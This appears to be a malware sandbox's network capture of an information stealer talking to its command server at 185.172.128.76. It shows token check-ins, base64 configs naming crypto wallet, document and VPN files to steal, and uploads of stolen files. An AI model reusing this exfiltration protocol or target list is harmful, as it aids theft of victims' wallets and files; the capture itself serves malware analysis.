                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a
                                                                                                                                                      Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"wallets------FCAFIJJJKEGIECAKKEHI--
                                                                                                                                                      Apr 27, 2024 02:20:26.134855032 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:26 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 2408
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                      Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:20:26.138108969 CEST466OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 265
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 2d 2d 0d 0a
                                                                                                                                                      Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="message"files------GHCGDAFCFHIDBGDHCFCB--
                                                                                                                                                      Apr 27, 2024 02:20:26.423995018 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:26 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 2052
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 [TRUNCATED]
                                                                                                                                                      Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBN [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:20:26.452708960 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHC
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:26.770195007 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:26 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:26.775603056 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIE
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:27.489249945 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:27 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:28.881104946 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JEHIJDGIEBKKFHJKJKEG
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:29.186351061 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:29 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:29.263416052 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJK
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:29.569799900 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:29 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:29.578474998 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHD
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:29.883465052 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:29 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:29.888953924 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:30.193886042 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:30 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:30.200241089 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAK
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:30.505644083 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:30 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:30.524327040 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:30.834345102 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:30 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:30.870182037 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:31.172732115 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:31 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:31.202467918 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBA
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:31.506700039 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:31 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:31.589046001 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJD
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:31.897634029 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:31 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:33.236044884 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBK
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:33.541258097 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:33 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:33.754786968 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHC
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:34.061584949 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:33 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:34.075155020 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBK
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:34.379735947 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:34 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:34.412189960 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDG
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:34.715635061 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:34 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:34.736892939 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDG
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:35.043673992 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:34 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:35.216276884 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:35.529304028 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:35 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:35.533696890 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CAAEBFHJJDAAKFIECGDB
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1743
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:35.835180044 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:35 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Apr 27, 2024 02:20:35.885049105 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Apr 27, 2024 02:20:36.404349089 CEST1289OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC
                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                      Content-Length: 1759
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 52 45 39 44 55 31 78 49 56 45 46 48 56 6b 52 47 56 55 6c 46 58 45 68 55 51 55 64 57 52 45 5a 56 53 55 55 75 5a 47 39 6a 65 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d [TRUNCATED]
                                                                                                                                                      Data Ascii: ------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU1xIVEFHVkRGVUlFXEhUQUdWREZVSUUuZG9jeA==------FIJDGIJJKEGIEBGCGDHCContent-Disposition: form-data; name="file"SFRBR1ZERlVJRUxHWkZDVFpaR1JTUUlTQ1hNT0tTQ0FaRUpWQVBCUEpLQUJJWktFR0ZBR01HT0lVUEhQSk9ZSVdNVklLV0NOVU9XRE1HQ0ZYSlFBTk1NT1VMSVZUUVFHVVpWVk9MWldCWVRIWU9ITU1WSU1UVEJCQ0FJR09OTlJWRVVNVENUQ0VNVFdGTkRTUVBIRVBMQUZaQUtZU1JPWktSUURVWk9VWklLSkdKUklCSk9ESE9VTEpIV1FCSUpTQUlZTVhMRk9TRk9FRktUUVBFRVdGVEZDSUZTTEhYU1hZWEJXVFBDV01DR1BFVE9TVkxOS1lDT05GV0NJVUZFUUtPV1FOUUtKU0laS05aWE9RV01USk9HV0RCVUZCS0RYVVBZWUlYVVRPUFNPVldMVktJT0tGUFNYREFWTUJVWklZWVpVUVRETFpJTVJSR1hMVE9FSk1GV0xPTU5QTkxJQ1BaUEtUSFBYRUxHQllUSkxPSk9FV05SRE5NWFhSWU1BSkJXQ1ROTUJSRUlKRFZWSVhFSEVHWVFLWlFDR0xWSE9DTVVTS1hDUVFNVVJMWUtXVUlVTUZTR1lNWlVRWENUWk9LUVlYSkFVREVWVFNPT1FVS1pLS0VFT0FOR1NJSVdUVVZFR0hUQ09UW [TRUNCATED]
                                                                                                                                                      Apr 27, 2024 02:20:36.704269886 CEST170INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:36 GMT
